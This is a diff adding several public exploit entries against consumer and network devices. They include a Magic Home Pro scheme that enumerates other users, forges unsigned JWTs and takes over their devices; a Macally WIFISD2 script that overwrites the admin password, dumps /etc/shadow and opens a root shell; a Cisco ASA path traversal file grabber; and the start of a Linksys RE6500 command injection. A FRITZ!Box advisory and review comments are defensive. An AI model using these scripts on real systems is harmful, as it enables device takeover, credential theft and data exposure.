diff --git a/exploits/android/webapps/49266.py b/exploits/android/webapps/49266.py
new file mode 100755
index 000000000..bd5b0c746
--- /dev/null
+++ b/exploits/android/webapps/49266.py
@@ -0,0 +1,292 @@
+# Exploit Title: Magic Home Pro 1.5.1 - Authentication Bypass 
+# Google Dork: NA
+# Date: 22 October 2020
+# Exploit Author: Victor Hanna (Trustwave SpiderLabs)
+# Author Github Page: https://9lyph.github.io/CVE-2020-27199/
+# Vendor Homepage: http://www.zengge.com/appkzd
+# Software Link: https://play.google.com/store/apps/details?id=com.zengge.wifi&hl=en
+# Version: 1.5.1 (REQUIRED)
+# Tested on: Android 10
+
+## Enumeration ##
+
+import requests
+import json
+import os
+from colorama import init
+from colorama import Fore, Back, Style
+import re
+
+'''
+1. First Stage Authentication
+2. Second Stage Enumerate
+3. Third Stage Remote Execute
+'''
+
+global found_macaddresses
+found_macaddresses = []
+global outtahere
+outtahere = ""
+q = "q"
+global token
+
+
+def turnOn(target, token):
+
+    urlOn = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001"
+    array = {
+        "dataCommandItems":[
+            {"hexData":"71230fa3","macAddress":target}
+        ]
+    }
+    data = json.dumps(array)
+    headersOn = {
+        "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
+        "Accept-Language": "en-US",
+        "Accept": "application/json", 
+        "Content-Type": "application/json; charset=utf-8",
+        "token":token,
+        "Host": "wifij01us.magichue.net",
+        "Connection": "close",
+        "Accept-Encoding": "gzip, deflate"
+    }
+    print (Fore.WHITE + "[+] Sending Payload ...")
+    response = requests.post(urlOn, data=data, headers=headersOn)
+    if response.status_code == 200:
+        if "true" in response.text:
+            print (Fore.GREEN + "[*] Endpoint " + Style.RESET_ALL + f"{target}" + Fore.GREEN + " Switched On")
+        else:
+            print (Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}")
+
+def turnOff(target, token):
+
+    urlOff = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001"
+    array = {
+        "dataCommandItems":[
+            {"hexData":"71240fa4","macAddress":target}
+        ]
+    }
+    data = json.dumps(array)
+    headersOff = {
+        "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
+        "Accept-Language": "en-US",
+        "Accept": "application/json", 
+        "Content-Type": "application/json; charset=utf-8",
+        "token":token,
+        "Host": "wifij01us.magichue.net",
+        "Connection": "close",
+        "Accept-Encoding": "gzip, deflate"
+    }
+    print (Fore.WHITE + "[+] Sending Payload ...")
+    response = requests.post(urlOff, data=data, headers=headersOff)
+    if response.status_code == 200:
+        if "true" in response.text:
+            print (Fore.GREEN + "[*] Endpoint " + Style.RESET_ALL + f"{target}" + Fore.GREEN + " Switched Off")
+        else:
+            print (Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}")
+
+def lighItUp(target, token):
+
+    outtahere = ""
+    q = "q"
+    if len(str(target)) < 12:
+        print (Fore.RED + "[!] Invalid target" + Style.RESET_ALL)
+    elif re.match('[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}$', target.lower()):
+        while outtahere.lower() != q.lower():
+            if outtahere == "0":
+                turnOn(target, token)
+            elif outtahere == "1":
+                turnOff(target, token)
+            outtahere = input(Fore.BLUE + "ON/OFF/QUIT ? (0/1/Q): " + Style.RESET_ALL)
+
+def Main():
+    urlAuth = "https://wifij01us.magichue.net/app/login/ZG001"
+
+    data = {
+        "userID":"<Valid Registered Email/Username>",
+        "password":"<Valid Registered Password>",
+        "clientID":""
+    }
+
+    headersAuth = {
+        "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
+        "Accept-Language": "en-US",
+        "Accept": "application/json", 
+        "Content-Type": "application/json; charset=utf-8",
+        "Host": "wifij01us.magichue.net",
+        "Connection": "close",
+        "Accept-Encoding": "gzip, deflate"
+    }
+
+    # First Stage Authenticate
+
+    os.system('clear')
+    print (Fore.WHITE + "[+] Authenticating ...")
+    response = requests.post(urlAuth, json=data, headers=headersAuth)
+    resJsonAuth = response.json()
+    token = (resJsonAuth['token'])
+
+    # Second Stage Enumerate
+
+    print (Fore.WHITE + "[+] Enumerating ...")
+    macbase = "C82E475DCE"
+    macaddress = []
+    a = ["%02d" % x for x in range(100)]
+    for num in a:
+        macaddress.append(macbase+num)
+
+    with open('loot.txt', 'w') as f:
+        for mac in macaddress:
+            urlEnum = "https://wifij01us.magichue.net/app/getBindedUserListByMacAddress/ZG001"
+            params = {
+                "macAddress":mac
+            }
+
+            headersEnum = {
+                "User-Agent": "Magic Home/1.5.1(ANDROID,9,en-US)",
+                "Accept-Language": "en-US",
+                "Content-Type": "application/json; charset=utf-8",
+                "Accept": "application/json",
+                "token": token,
+                "Host": "wifij01us.magichue.net",
+                "Connection": "close",
+                "Accept-Encoding": "gzip, deflate"
+            }
+
+            response = requests.get(urlEnum, params=params, headers=headersEnum)
+            resJsonEnum = response.json()
+            data = (resJsonEnum['data'])
+            if not data:
+                pass
+            elif data:
+                found_macaddresses.append(mac)
+                print (Fore.GREEN + "[*] MAC Address Identified: " + Style.RESET_ALL + f"{mac}" + Fore.GREEN + f", User: " + Style.RESET_ALL + f"{(data[0]['userName'])}, " + Fore.GREEN + "Unique ID: " + Style.RESET_ALL + f"{data[0]['userUniID']}, " + Fore.GREEN + "Binded ID: " + Style.RESET_ALL + f"{data[0]['bindedUniID']}")
+                f.write(Fore.GREEN + "[*] MAC Address Identified: " + Style.RESET_ALL + f"{mac}" + Fore.GREEN + f", User: " + Style.RESET_ALL + f"{(data[0]['userName'])}, " + Fore.GREEN + "Unique ID: " + Style.RESET_ALL + f"{data[0]['userUniID']}, " + Fore.GREEN + "Binded ID: " + Style.RESET_ALL + f"{data[0]['bindedUniID']}\n")
+            else:
+                print (Fore.RED + "[-] No results found!")
+                print(Style.RESET_ALL)
+
+        if not found_macaddresses:
+            print (Fore.RED + "[-] No MAC addresses retrieved")
+        elif found_macaddresses:
+            attackboolean = input(Fore.BLUE + "Would you like to Light It Up ? (y/N): " + Style.RESET_ALL)
+            if (attackboolean.upper() == 'Y'):
+                target = input(Fore.RED + "Enter a target device mac address: " + Style.RESET_ALL)
+                lighItUp(target, token)
+            elif (attackboolean.upper() == 'N'):
+                print (Fore.CYAN + "Sometimes, belief isn’t about what we can see. It’s about what we can’t."+ Style.RESET_ALL)
+            else:
+                print (Fore.CYAN + "The human eye is a wonderful device. With a little effort, it can fail to see even the most glaring injustice." + Style.RESET_ALL)
+
+if __name__ == "__main__":
+    Main()
+
+## Token Forging ##
+
+#!/usr/local/bin/python3
+
+import url64
+import requests
+import json
+import sys
+import os
+from colorama import init
+from colorama import Fore, Back, Style
+import re
+import time
+from wsgiref.handlers import format_date_time
+from datetime import datetime
+from time import mktime
+
+now = datetime.now()
+stamp = mktime(now.timetuple())
+
+'''
+HTTP/1.1 200
+Server: nginx/1.10.3
+Content-Type: application/json;charset=UTF-8
+Connection: close
+
+"{\"code\":0,\"msg\":\"\",\"data\":{\"webApi\":\"wifij01us.magichue.net/app\",\"webPathOta\":\"http:\/\/wifij01us.magichue.net\/app\/ota\/download\",\"tcpServerController\":\"TCP,8816,ra8816us02.magichue.net\",\"tcpServerBulb\":\"TCP,8815,ra8815us02.magichue.net\",\"tcpServerControllerOld\":\"TCP,8806,mhc8806us.magichue.net\",\"tcpServerBulbOld\":\"TCP,8805,mhb8805us.magichue.net\",\"sslMqttServer\":\"ssl:\/\/192.168.0.112:1883\",\"serverName\":\"Global\",\"serverCode\":\"US\",\"userName\":\"\",\"userEmail\":\"\",\"userUniID\":\"\"},\"token\":\"\"}"
+'''
+
+def Usage():
+    print (f"Usage: {sys.argv[0]} <username> <unique id>")
+
+def Main(user, uniqid):
+    os.system('clear')
+    print ("[+] Encoding ...")
+    print ("[+] Bypass header created!")
+    print ("HTTP/1.1 200")
+    print ("Server: nginx/1.10.3")
+    print ("Date: "+str(format_date_time(stamp))+"")
+    print ("Content-Type: application/json;charset=UTF-8")
+    print ("Connection: close\r\n\r\n")
+
+    jwt_header = '{"typ": "JsonWebToken","alg": "None"}'
+    jwt_data = '{"userID": "'+user+'", "uniID": "'+uniqid+'","cdpid": "ZG001","clientID": "","serverCode": "US","expireDate": 1618264850608,"refreshDate": 1613080850608,"loginDate": 1602712850608}'
+    jwt_headerEncoded = url64.encode(jwt_header.strip())
+    jwt_dataEncoded = url64.encode(jwt_data.strip())
+    jwtcombined = (jwt_headerEncoded.strip()+"."+jwt_dataEncoded.strip()+".")
+    print ("{\"code\":0,\"msg\":\"\",\"data\":{\"webApi\":\"wifij01us.magichue.net/app\",\"webPathOta\":\"http://wifij01us.magichue.net/app/ota/download\",\"tcpServerController\":\"TCP,8816,ra8816us02.magichue.net\",\"tcpServerBulb\":\"TCP,8815,ra8815us02.magichue.net\",\"tcpServerControllerOld\":\"TCP,8806,mhc8806us.magichue.net\",\"tcpServerBulbOld\":\"TCP,8805,mhb8805us.magichue.net\",\"sslMqttServer\":\"ssl:\/\/192.168.0.112:1883\",\"serverName\":\"Global\",\"serverCode\":\"US\",\"userName\":\""+user+"\",\"userEmail\":\""+user+"\",\"userUniID\":\""+uniqid+"\"},\"token\":\""+jwtcombined+"\"}")
+
+if __name__ == "__main__":
+    if len(sys.argv) < 3:
+        Usage()
+    else:
+        Main(sys.argv[1], sys.argv[2])
+
+## Device Takeover PoC ##
+
+#!/usr/local/bin/python3
+
+import url64
+import requests
+import json
+import sys
+import os
+from colorama import init
+from colorama import Fore, Back, Style
+import re
+
+def Usage():
+    print (f"Usage: {sys.argv[0]} <attacker email> <target email> <target mac address> <target forged token>")
+
+def Main():
+
+    attacker_email = sys.argv[1]
+    target_email = sys.argv[2]
+    target_mac = sys.argv[3]
+    forged_token = sys.argv[4]
+
+    os.system('clear')
+    print (Fore.WHITE + "[+] Sending Payload ...")
+    url = "https://wifij01us.magichue.net/app/shareDevice/ZG001"
+
+    array = {"friendUserID":attacker_email, "macAddress":target_mac}
+
+    data = json.dumps(array)
+
+    headers = {
+        "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
+        "Accept-Language": "en-US",
+        "Accept": "application/json", 
+        "Content-Type": "application/json; charset=utf-8",
+        "token":forged_token,
+        "Host": "wifij01us.magichue.net",
+        "Connection": "close",
+        "Accept-Encoding": "gzip, deflate"
+    }
+    
+    response = requests.post(url, data=data, headers=headers)
+    if response.status_code == 200:
+        if "true" in response.text:
+            print (Fore.GREEN + "[*] Target is now yours ... " + Style.RESET_ALL)
+        else:
+            print (Fore.RED + "[-] Failed to take over target !" + Style.RESET_ALL)
+
+if __name__ == "__main__":
+    if len(sys.argv) < 5:
+        Usage()
+    else:
+        Main()
\ No newline at end of file
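Review bot: The header block (`# Exploit Title` through `# Tested on`) has no CVE field and no statement of the root cause, although both can be read off the file: the author URL names CVE-2020-27199, and the token-forging part builds a JWT with `"alg": "None"` and an empty signature segment (`jwtcombined` ends in `.`). I would add `# CVE: CVE-2020-27199` and a comment such as `# Root cause: the backend accepts unsigned JWTs and answers getBindedUserListByMacAddress for MACs not bound to the caller; the fix is server-side signature and ownership checks.` (the server-side behaviour is inferred from what the script sends, it is not shown here). Separately, the file is three scripts pasted into one module, so `Main`, `Usage` and the `__main__` guard are each defined more than once and later definitions shadow earlier ones. `loot.txt` also receives the ANSI colour codes together with other users' names and IDs, which deserves a comment at the `open('loot.txt', 'w')` line.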
diff --git a/exploits/hardware/remote/49293.txt b/exploits/hardware/remote/49293.txt
new file mode 100644
index 000000000..b57f9a2ac
--- /dev/null
+++ b/exploits/hardware/remote/49293.txt
@@ -0,0 +1,191 @@
+# Exploit Title: FRITZ!Box 7.20 - DNS Rebinding Protection Bypass
+# Date: 2020-06-23
+# Exploit Author: RedTeam Pentesting GmbH
+# Vendor Homepage: https://en.avm.de/
+# Version: 7.20
+# CVE: 2020-26887
+
+Advisory: FRITZ!Box DNS Rebinding Protection Bypass
+
+RedTeam Pentesting discovered a vulnerability in FRITZ!Box router
+devices which allows to resolve DNS answers that point to IP addresses
+in the private local network, despite the DNS rebinding protection
+mechanism.
+
+
+Details
+=======
+
+Product: FRITZ!Box 7490 and potentially others
+Affected Versions:  7.20 and below
+Fixed Versions: >= 7.21
+Vulnerability Type: Bypass
+Security Risk: low
+Vendor URL: https://en.avm.de/
+Vendor Status: fixed version released
+Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-003
+Advisory Status: published
+CVE: 2020-26887 
+CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-26887
+
+
+Introduction
+============
+
+"For security reasons, the FRITZ!Box suppresses DNS responses that refer
+to IP addresses in its own home network. This is a security function of
+the FRITZ!Box to protect against what are known as DNS rebinding
+attacks."
+
+(from the vendor's homepage)
+
+
+More Details
+============
+
+FRITZ!Box router devices employ a protection mechanism against DNS
+rebinding attacks. If a DNS answer points to an IP address in the
+private network range of the router, the answer is suppressed. Suppose
+the FRITZ!Box routers DHCP server is in its default configuration and
+serves the private IP range of 192.168.178.1/24. If a DNS request is
+made by a connected device, which resolves to an IPv4 address in the
+configured private IP range (for example 192.168.178.20) an empty answer
+is returned. However, if instead the DNS answer contains an AAAA-record
+with the same private IP address in its IPv6 representation
+(::ffff:192.168.178.20) it is returned successfully. Furthermore, DNS
+requests which resolve to the loopback address 127.0.0.1 or the special
+address 0.0.0.0 can be retrieved, too.
+
+
+Proof of Concept
+================
+
+Supposing the following resource records (RR) are configured for different
+subdomains of example.com:
+
+------------------------------------------------------------------------
+private.example.com        1  IN  A     192.168.178.20
+local.example.com          1  IN  A     127.0.0.1
+privateipv6.example.com.   1  IN  AAAA  ::ffff:192.168.178.20
+------------------------------------------------------------------------
+
+A DNS request to the FRITZ!Box router for the subdomain
+private.example.com returns an empty answer, as expected:
+
+------------------------------------------------------------------------
+$ dig private.example.com @192.168.178.1
+; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> private.example.com @192.168.178.1
+;; global options: +cmd
+;; Got answer:
+;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 58984
+;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0
+
+;; QUESTION SECTION:
+;private.example.com.	IN	A
+------------------------------------------------------------------------
+
+DNS requests for the subdomains privateipv6.example.com and
+local.example.com return the configured resource records successfully,
+effectively bypassing the DNS rebinding protection:
+
+------------------------------------------------------------------------
+$ dig privateipv6.example.com @192.168.178.1 AAAA
+; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> @192.168.178.1 privateipv6.example.com AAAA
+; (1 server found)
+;; global options: +cmd
+;; Got answer:
+;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6510
+;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 3
+
+;; OPT PSEUDOSECTION:
+; EDNS: version: 0, flags:; udp: 4096
+;; QUESTION SECTION:
+;privateipv6.example.com.	IN	AAAA
+
+;; ANSWER SECTION:
+privateipv6.example.com. 1	IN	AAAA	::ffff:192.168.178.20
+
+
+$ dig local.example.com @192.168.178.1
+; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> local.example.com @192.168.178.1
+;; global options: +cmd
+;; Got answer:
+;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 28549
+;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 3
+
+;; OPT PSEUDOSECTION:
+; EDNS: version: 0, flags:; udp: 4096
+;; QUESTION SECTION:
+;local.example.com.	IN	A
+
+;; ANSWER SECTION:
+local.example.com. 1	IN	A	127.0.0.1
+------------------------------------------------------------------------
+
+
+Workaround
+==========
+
+None.
+
+
+Fix
+===
+
+The problem is corrected in FRITZ!OS 7.21.
+
+
+Security Risk
+=============
+
+As shown, the DNS rebinding protection of FRITZ!Box routers can be
+bypassed allowing for DNS rebinding attacks against connected devices.
+This type of attack however is only possible if vulnerable services are
+present in the local network, which are reachable over HTTP without
+authentication. The web interface of FRITZ!Box routers for example is
+not vulnerable to this type of attack, since the HTTP Host header is
+checked for known domains. For this reason the risk is estimated to be
+low.
+
+
+Timeline
+========
+
+2020-06-23 Vulnerability identified
+2020-07-08 Vendor notified
+2020-07-20 Vendor provided fixed version to RedTeam Pentesting
+2020-07-23 Vendor notified of another problematic IP
+2020-08-06 Vendor provided fixed version to RedTeam Pentesting
+2020-10-06 Vendor starts distribution of fixed version for selected devices 
+2020-10-19 Advisory released
+
+
+RedTeam Pentesting GmbH
+=======================
+
+RedTeam Pentesting offers individual penetration tests performed by a
+team of specialised IT-security experts. Hereby, security weaknesses in
+company networks or products are uncovered and can be fixed immediately.
+
+As there are only few experts in this field, RedTeam Pentesting wants to
+share its knowledge and enhance the public knowledge with research in
+security-related areas. The results are made available as public
+security advisories.
+
+More information about RedTeam Pentesting can be found at:
+https://www.redteam-pentesting.de/
+
+
+Working at RedTeam Pentesting
+=============================
+
+RedTeam Pentesting is looking for penetration testers to join our team
+in Aachen, Germany. If you are interested please visit:
+https://www.redteam-pentesting.de/jobs/
+
+-- 
+RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0
+Dennewartstr. 25-27                       Fax : +49 241 510081-99
+52068 Aachen                    https://www.redteam-pentesting.de
+Germany                         Registergericht: Aachen HRB 14004
+Geschäftsführer:                       Patrick Hof, Jens Liebchen
\ No newline at end of file
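Review bot: The `Workaround` section says `None.`, while the `Security Risk` section names the condition that limits the attack: only LAN services reachable over HTTP without authentication are exposed, and the FRITZ!Box web interface is unaffected because it checks the Host header. A reader on an unpatched version would be helped by a sentence under Workaround along the lines of `Until FRITZ!OS 7.21 is installed, services in the local network should validate the HTTP Host header and require authentication.` Two small consistency points: the header field `# CVE: 2020-26887` drops the `CVE-` prefix, and `192.168.178.1/24` in `More Details` gives a host address where the network `192.168.178.0/24` is presumably meant.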
diff --git a/exploits/hardware/webapps/49256.py b/exploits/hardware/webapps/49256.py
new file mode 100755
index 000000000..20f038900
--- /dev/null
+++ b/exploits/hardware/webapps/49256.py
@@ -0,0 +1,140 @@
+# Exploit Title: Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation
+# Date: 03.12.2020 
+# Exploit Author: Maximilian Barz and Daniel Schwendner
+# Vendor Homepage: https://us.macally.com/products/wifisd2
+# Version: 2.000.010
+# Tested on: Kali Linux 5.7.0-kali1-amd64
+# CVE : CVE-2020-29669
+# Reference: https://github.com/S1lkys/CVE-2020-29669/
+
+#!/usr/bin/env/python3
+import requests
+import telnetlib
+import os
+import sys
+import re
+
+banner = '''\033[94m
+  ██████ ▄▄▄█████▓ ▄▄▄       ██▀███   ▄▄▄▄    █    ██  ██▀███    ██████ ▄▄▄█████▓
+▒██    ▒ ▓  ██▒ ▓▒▒████▄    ▓██ ▒ ██▒▓█████▄  ██  ▓██▒▓██ ▒ ██▒▒██    ▒ ▓  ██▒ ▓▒
+░ ▓██▄   ▒ ▓██░ ▒░▒██  ▀█▄  ▓██ ░▄█ ▒▒██▒ ▄██▓██  ▒██░▓██ ░▄█ ▒░ ▓██▄   ▒ ▓██░ ▒░
+  ▒   ██▒░ ▓██▓ ░ ░██▄▄▄▄██ ▒██▀▀█▄  ▒██░█▀  ▓▓█  ░██░▒██▀▀█▄    ▒   ██▒░ ▓██▓ ░ 
+▒██████▒▒  ▒██▒ ░  ▓█   ▓██▒░██▓ ▒██▒░▓█  ▀█▓▒▒█████▓ ░██▓ ▒██▒▒██████▒▒  ▒██▒ ░ 
+▒ ▒▓▒ ▒ ░  ▒ ░░    ▒▒   ▓▒█░░ ▒▓ ░▒▓░░▒▓███▀▒░▒▓▒ ▒ ▒ ░ ▒▓ ░▒▓░▒ ▒▓▒ ▒ ░  ▒ ░░   
+░ ░▒  ░ ░    ░      ▒   ▒▒ ░  ░▒ ░ ▒░▒░▒   ░ ░░▒░ ░ ░   ░▒ ░ ▒░░ ░▒  ░ ░    ░    
+░  ░  ░    ░        ░   ▒     ░░   ░  ░    ░  ░░░ ░ ░   ░░   ░ ░  ░  ░    ░      
+      ░                 ░  ░   ░      ░         ░        ░           ░           
+                                           ░                                     
+\x1b[0m
+Macally WIFISD2 Guest to Root Privilege Escalation for CVE-2020-29669 by Maximilian Barz and Daniel Schwendner 
+'''
+def main():
+    if(len(sys.argv) < 2):
+        print(banner)
+        print("Usage: %s <host> " % sys.argv[0])
+        print("Eg:    %s 1.2.3.4 " % sys.argv[0])
+        return
+    rhost = sys.argv[1]
+    session = requests.Session()
+    guest_creds = "guest_pass"
+    admin_pass_to_set = "Silky123"
+
+    def send_requests():
+        url = "http://"+rhost+"/protocol.csp?function=set"
+        payload = {'fname':'security','opt':'pwdchk','name':'guest','pwd1':guest_creds,'function':'set'}
+        headers = {
+            'Host': rhost,
+            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
+            'Accept': '*/*',
+            'Accept-Language': 'en-US,en;q=0.5',
+            'Accept-Encoding': 'gzip, deflate',
+            'Referer': 'http://'+rhost+'/index.html',
+            'Content-Type': 'application/x-www-form-urlencoded',
+            'Content-Length': '65',
+            'Connection': 'close',
+            'Cache-Control': 'no-cache',
+        }
+        
+        r= session.post(url, payload, headers)
+        if (b"<errno>0</errno>" in r.content):
+            print("\033[92m[+] Authentication successful\x1b[0m")
+            print("\t"+str(session.cookies.get_dict()))
+        else:
+            print("\033[91m[+] Authentication failed.\x1b[0m")
+            sys.exit()
+
+        url = "http://"+rhost+"/protocol.csp?fname=security&function=set"    
+        payload = {'name':'admin','opt':'pwdmod','pwd1':admin_pass_to_set,'pwd2':admin_pass_to_set}
+        headers = {
+            'Host': rhost,
+            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
+            'Accept': '*/*',
+            'Accept-Language': 'en-US,en;q=0.5',
+            'Accept-Encoding': 'gzip, deflate',
+            'Referer': 'http://'+rhost+'/app/user/guest.html',
+            'Content-Type': 'application/x-www-form-urlencoded',
+            'Content-Length': '49',
+            'Connection': 'close',
+            'Cache-Control': 'no-cache',
+        }
+        d = session.post(url, payload, headers)
+        if (b"<errno>0</errno>" in d.content):
+            print("\033[92m[+] Admin Password changed to: "+admin_pass_to_set+"\x1b[0m")
+            telnet_grep_root_hash()
+            #print("[+] Spawning Admin Shell")
+            #telnet_login()
+        else:
+            print("\033[91m[+] Admin Password change failed\x1b[0m")
+            sys.exit()
+
+
+    def telnet_grep_root_hash():
+        user = "admin"
+        tn = telnetlib.Telnet(rhost)
+        tn.read_until(b"login: ")
+        tn.write(user.encode('ascii') + b"\n")
+        tn.read_until(b"Password: ")
+        tn.write(admin_pass_to_set.encode('ascii') + b"\n")
+        print("\033[92m[+] Dumping Hashes:\x1b[0m")
+        tn.write(b"cat /etc/shadow\n\r")
+        tn.write(b"exit\n")
+        output = tn.read_all().decode('ascii')
+        L = output.split('\n')
+        for hash in L:
+            if ":" in hash:
+                print("\t"+hash)
+        print("\n\r")
+        for hash in L:
+            if "root" in hash:
+                print("\033[92m[+] Root Hash found, trying to crack it..\x1b[0m")
+                print("\t"+hash)  #root:$1$D0o034Sm$LY0jyeFPifEXVmdgUfSEj/:15386:0:99999:7:::
+                f = open("root_hash","w+")
+                f.write(hash)
+                f.close()
+                crack_root_hash();
+
+
+    def crack_root_hash():
+        f = open("root_hash", "r")
+        hash = f.read()
+        if ("root:$1$D0o034Sm$LY0jyeFPifEXVmdgUfSEj/:15386:0:99999:7:::" in hash):
+            print("\033[92mRoot Password: 20080826\x1b[0m\n")
+            telnet_login()
+        else:
+            os.system("hashcat -a 0 -m 500 root_hash /root/tools/routersploit/routersploit/resources/wordlists/passwords.txt") #https://github.com/threat9/routersploit/blob/master/routersploit/resources/wordlists/passwords.txt
+
+    def telnet_login():
+        print("\033[92m[+] Spawning Rootshell\x1b[0m")
+        user = "root"
+        root_password="20080826"
+        tn = telnetlib.Telnet(rhost)
+        tn.read_until(b"login: ")
+        tn.write(user.encode('ascii') + b"\n")
+        tn.read_until(b"Password: ")
+        tn.write(root_password.encode('ascii') + b"\n")
+        tn.interact()
+    print(banner)
+    send_requests()
+
+if(__name__ == '__main__'):
+    main()
\ No newline at end of file
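Review bot: Nothing in the header or in `main` records what the script changes or which weakness it relies on, though both are visible in the code: `send_requests` logs in as `guest` and then posts `opt=pwdmod` for `name=admin` on the same session, and `crack_root_hash` compares against a fixed root hash with a fixed password. A comment above `send_requests` would cover it, for example `# Root cause: the pwdmod handler does not check that the session belongs to the account being changed; side effects: the admin password is overwritten and the root shadow entry is written to ./root_hash.` (the handler behaviour is inferred from the requests, not shown). On the code itself, `session.post(url, payload, headers)` passes `headers` in the positional slot that `requests` uses for `json`, so the dict is not applied as headers. `crack_root_hash` also never closes the file it opens.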
diff --git a/exploits/hardware/webapps/49262.py b/exploits/hardware/webapps/49262.py
new file mode 100755
index 000000000..3ae7ad1f6
--- /dev/null
+++ b/exploits/hardware/webapps/49262.py
@@ -0,0 +1,113 @@
+# Exploit Title: Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)
+# Date: 12 Dec 2020
+# Exploit Author: Freakyclown@cygenta.co.uk
+# Vendor Homepage: cisco.com
+# Software Link: It’s against Hardware, specifically ASA’s and FTD’s
+# Version: ASAs (from version 9.6 to 9.14.1.10) and FTD’s (versions 6.2.3 to 6.6.0.1)
+# Tested on: exploit runs on Python3 on OSX and on Kali Linux against cisco ASA 9.14
+# CVE : CVE-2020-3452
+# Github : https://github.com/cygenta/CVE-2020-3452
+
+import requests
+
+# Written by freakyclown for @CygentaHQ
+# Cisco ASA Path Traversal
+# CVE-2020-3452
+# Usage: CVE-2020-3452.py {target}"
+# Example: CVE-2020-3452.py 192.168.0.12"
+# Requires - Requests - pip3 install requests
+#
+# This tool takes advantage of the above cve and attempts to
+# download files as listed below, it is suggested that you make
+# a working folder for the outputfiles to avoid confusion if
+# attacking mutliple ASA's
+
+# set your target
+target = input("Enter target IP/Url: ")
+
+
+def grabstuff():
+    for file in files:
+        print("trying: ", file)
+
+        #set request parameters
+        params = (
+            ('type', 'mst'),
+            ('textdomain', '+CSCOE+/'+file),
+            ('default-language', ''),
+            ('lang', '../'),
+        )
+
+        # set the response to the result of the request, inputting in target and params and ignoring ssl cert problems
+        response = requests.get('https://'+target+'/+CSCOT+/translation-table', params=params, verify=False)
+        # write the file to the disk
+        f = open(file,"w")
+        f.write(response.text) 
+        f.close()
+
+
+
+# this is a list of files available to download, more will be added in time
+# if anyone has a list of ASA files, I'd be happy to add here
+files = {
+"sess_update.html",
+"blank.html",
+"noportal.html",
+"portal_ce.html",
+"portal.html",
+"logon_custom.css",
+"svc.html",
+"logo.gif",
+"portal_inc.lua",
+"nostcaccess.html",
+"session.js",
+"portal.js",
+"portal_custom.css",
+"running.conf",
+"tlbrportal_forms.js",
+"logon_forms.js",
+"win.js",
+"portal.css",
+"lced.html",
+"pluginlib.js",
+"useralert.html",
+"ping.html",
+"app_index.html",
+"shshimdo_url",
+"session_password.html",
+"relayjar.html",
+"relayocx.html",
+"color_picker.js",
+"color_picker.html",
+"cedhelp.html",
+"cedmain.html",
+"cedlogon.html",
+"cedportal.html",
+"portal_elements.html",
+"commonspawn.js",
+"common.js",
+"appstart.js",
+"relaymonjar.html",
+"relaymonocx.html",
+"cedsave.html",
+"tunnel_linux.jnlp",
+"ask.html",
+"no_svc.html",
+"preview.html",
+"cedf.html",
+"ced.html",
+"logon_redirect.html",
+"logout.html",
+"tunnel_mac.jnlp",
+"gp-gip.html",
+"auth.html",
+"wrong_url.html",
+"logon.html"}
+
+
+# obvious thing is obvious, try the things and barf if fail
+try:
+    grabstuff()
+except Exception as err:
+    print("Something went wrong sorry")
+    print(err)
\ No newline at end of file
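Review bot: `grabstuff` writes `response.text` to disk without checking `response.status_code`, so a device that rejects the request still yields one local file per entry in `files`, holding the error body, and the run cannot be told apart from a successful read. Guarding the write with `if response.status_code != 200: continue`, placed before `f = open(file,"w")`, keeps the output meaningful when the script is used to confirm that an appliance is patched. `verify=False` is set without a comment, and `open`/`close` is used where a `with` block would close the file on error. For log review, the request shape is fixed by the `params` tuple: a GET to `/+CSCOT+/translation-table` with `lang=../` and a `textdomain` starting `+CSCOE+/`, which is worth stating in the header comment.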
diff --git a/exploits/hardware/webapps/49270.py b/exploits/hardware/webapps/49270.py
new file mode 100755
index 000000000..93f9c27ed
--- /dev/null
+++ b/exploits/hardware/webapps/49270.py
@@ -0,0 +1,54 @@
+# Exploit Title: Linksys RE6500 1.0.11.001 - Unauthenticated RCE
+# Date: 31/07/2020
+# Exploit Author: RE-Solver
+# Public disclosure: https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html#4
+# Vendor Homepage: www.linksys.com
+# Version:  FW V1.05 up to FW v1.0.11.001
+# Tested on: FW V1.05 up to FW v1.0.11.001
+# Linksys RE6500 V1.0.05.003 and newer - Unauthenticated RCE
+# Unsanitized user input in the web interface for Linksys WiFi extender RE6500 allows Unauthenticated remote command execution. 
+# An attacker can access system OS configurations and commands that are not intended for use beyond the web UI. 
+
+#!/usr/bin/env python
+
+from requests import Session
+import requests
+import os
+print("Linksys RE6500, RE6500 - Unsanitized user input allows Unauthenticated remote command execution.")
+print("Tested on FW V1.05 up to FW v1.0.11.001")
+print("RE-Solver @solver_re")
+ip="192.168.1.226"
+
+command="nvram_get Password >/tmp/lastpwd"
+#save device password;
+post_data="admuser=admin&admpass=;"+command+";&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1"
+url_codeinjection="http://"+ip+"/goform/setSysAdm"
+s = requests.Session()
